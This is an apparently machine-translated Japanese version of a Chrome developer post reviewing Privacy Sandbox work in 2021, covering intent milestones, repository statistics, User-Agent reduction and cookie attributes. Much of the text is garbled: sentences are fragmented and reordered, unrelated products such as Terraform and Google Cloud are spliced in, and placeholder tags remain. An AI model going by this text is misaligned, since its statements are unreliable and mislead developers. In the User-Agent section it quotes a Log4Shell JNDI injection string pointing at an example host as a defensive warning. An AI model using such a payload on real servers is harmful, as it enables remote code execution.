Progress in the Privacy 2021 年の総括版へようこそ サンドボックスでマイルストーンを Chrome におけるサードパーティ Cookie を段階的に廃止し、 アクセスすることもできます。通常、プライバシー サンドボックスの更新内容について タイムラインや、 12 月は静かな月でしたその代わりに、いくつかのコースを振り返って 2021 年の活動を確認し、考えられる解決策をいくつか提示します。 新年を迎えることができました。
Chromium 開発プロセス
新しいウェブ プラットフォーム機能を Chromium に組み込むには、 プロジェクトのオープン開発ツールである プロセスをご覧ください。2021 年には、 プライバシー サンドボックス チームが作成:
| 🥚 | プロトタイプからプロトタイピング | 19 |
| 🧪 | テストの意図 | 7 |
| 🚀 | 出荷の意図 | 11 |
各マイルストーンは、より広範なウェブ エコシステムへの貢献の招待でもあります。
プロトタイプのインテントは最初のチェックポイントで、そこでディスカッションを行います。 早期のテストが必要ですこれは提案が GitHub 問題を作成して質問したり、ディスカッションに参加したり、 標準 HTML 形式で グループ(W3C や IETF。また、ここからコーディングが始まり、 デベロッパーが Android Enterprise API のバックグラウンド でのテストに利用できるように、 機能 報告します。 提案の検証と反復作業には、最初のフィードバックが不可欠です。
テストのインテントは、 オリジン トライアルデベロッパーはオリジンに登録できる 機能を試用して、本番環境でテストできます。 「テスト」と呼ばれるのは 機能の特定の側面を 現実の環境で検証できます。Google Cloud 環境で テストの結果を共有し、テストのイテレーションやテストの実施に役立つ貴重なフィードバックを提供する。 機能を進化させます
[Intent to Ship] は、機能が実装済みであることを示す最後のマイルストーン 一般提供する準備が整いました。承認されると、対象物は 次期リリースに統合され、その後、Canary、Beta、 説明しますまず、Terraform でテストし、 カナリアと Chrome のベータ版 機能が安定版になる前にバグを報告してください。
提案
プライバシー サンドボックスの各プロポーザルには、付属の GitHub リポジトリがあります。 全体的な機能の概要を説明した説明、詳細な説明を ブラウザによる実装の仕様、 Issue と pull リクエストの形で示されます。
14 のプライバシー サンドボックス リポジトリで、次のことを行いました。
| 💬 | 545 | 問題が作成されました |
| 250 | クローズされた問題 | |
| 🛠️ | 261 | 作成された pull リクエスト |
| 223 | pull リクエストがマージされました |
説明や仕様の文言は、多くの場合、オーディエンスを対象としている 標準やブラウザ開発にすでに精通しているため、 馴染みのない人にとっては難しいものですただし、説明の目的は、 説明しましょう。不明な点やカバーされていない要点がある場合は、 問題を報告し、説明を更新して明確にします。
解決策
ユーザー エージェントのスプリング クリーニング
新年までカウントダウンすると同時に、両方の最大までカウントします。 Chrome 100 と段階的な削減額 によって識別されます。これは良い コード内でのユーザー エージェント文字列の使用を見直して、 この変更の影響を受けるか確認できます
これらの領域を確認する方法は次のとおりです。
- JavaScript コードで
navigator.userAgentを検索するか、 サーバーコードのUser-Agentヘッダー。 - 文字列の解析結果を確認し、2 桁のバージョンに関する仮定を確認します。対象
たとえば、
\d\dまたは\d{2}を指定する正規表現は、\d+。 - 以下のコードに依存している部分では、文字列を使用しているかどうかを確認します。
<ph type="x-smartling-placeholder">
- </ph>
- プラットフォーム(オペレーティング システム)のバージョン
- フルビルド バージョン
- モバイル デバイス名
- これらの値は、将来的には固定文字列に削減される予定です。条件 これらの値へのアクセス権が必要な場合は、User-Agent Client に移行してください。 ヒント。
User-Agent Client を採用する場合、12 月のアップデートについてお伝えください。
ヒント。他のエージェントへのヒントの委任を可能にするために、Intent to Shipを送信しました。
起源
HTML
<meta> タグで指定できます。例:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
春の大掃除が大好きな場合は、 代替手段があります。文字列を使用して モバイル デバイスを検出し、レスポンシブ ディスプレイ広告に切り替えられないか調査する 考えています機能のサポート状況についてブラウザの名前とバージョンを確認する場合は、 代わりに特徴検出を使用できます
ユーザー エージェントは、ユーザーが指定するクライアント
その正確さは保証されず、提供されることも保証されません。最近の Log4j
"Log4shell"
例を挙げます。ユーザー エージェント文字列を
${jndi:ldap://example.com/file} などの値を含めることで、サイトを取得できる可能性があります
サーバーでアクティブに解析する必要があります
Cookie のカタログ化
もう一つの伝統的なお正月のアクティビティは、自分の幸せを確かめることです。
品質の食材を使った健康的なクッキーを作ることです。これからご紹介する
サードパーティ Cookie の段階的な廃止に向けて
影響を受けるサイトの Cookie を確認します2020 年は、
すべての Cookie にクロスサイトまたはサードパーティをマークする必要があった
使用
SameSite=None と一緒に使用できます。
SameSite 属性を None に設定した Cookie には、
更新されます
現時点では、次の 3 つの方法を検討できます。
- トップレベル サイトと 1 対 1 の関係でのみ Cookie が必要な場合は、
CHIPS の進捗状況を
提案をご覧ください。つまり
Cookie に
Partitioned属性を追加します。 - Cookie がクロスサイト コンテキストで使用されるが、それはお客様がアクセスした複数のサイト間でのみ
所有および運営している場合は、ファーストパーティ データに基づく
セット。そのためには、Terraform の
SameParty属性を Cookie に追加します。 - Cookie を使用して、なんらかの形で価値の共有先を複数の プライバシー サンドボックスを幅広く調査し、 サポートしない別のソリューションを提案します クロスサイト トラッキングに依存しています
特に健康意識が高い場合は、このタイミングが理想的です Cookie の使用状況をすべて再確認できます ファーストパーティの Cookie などです
フィードバック
Google はこれらの月次アップデートを継続的に公開し、 プライバシーサンドボックス全体として Google はデベロッパーの皆様に 必要な情報とサポートを提供します。@ChromiumDev でお知らせください X(旧 Twitter)でお知らせください。 説明します。いただいたご意見は、今後のフォーマットの改善に役立てさせていただきます。
プライバシー サンドボックスに関するよくある質問をご覧ください。 デベロッパー サポートに送信した問題に応じて拡張されていきます。 リポジトリをご覧ください。もし 提案のテストや実装について質問がある方は お話ししましょう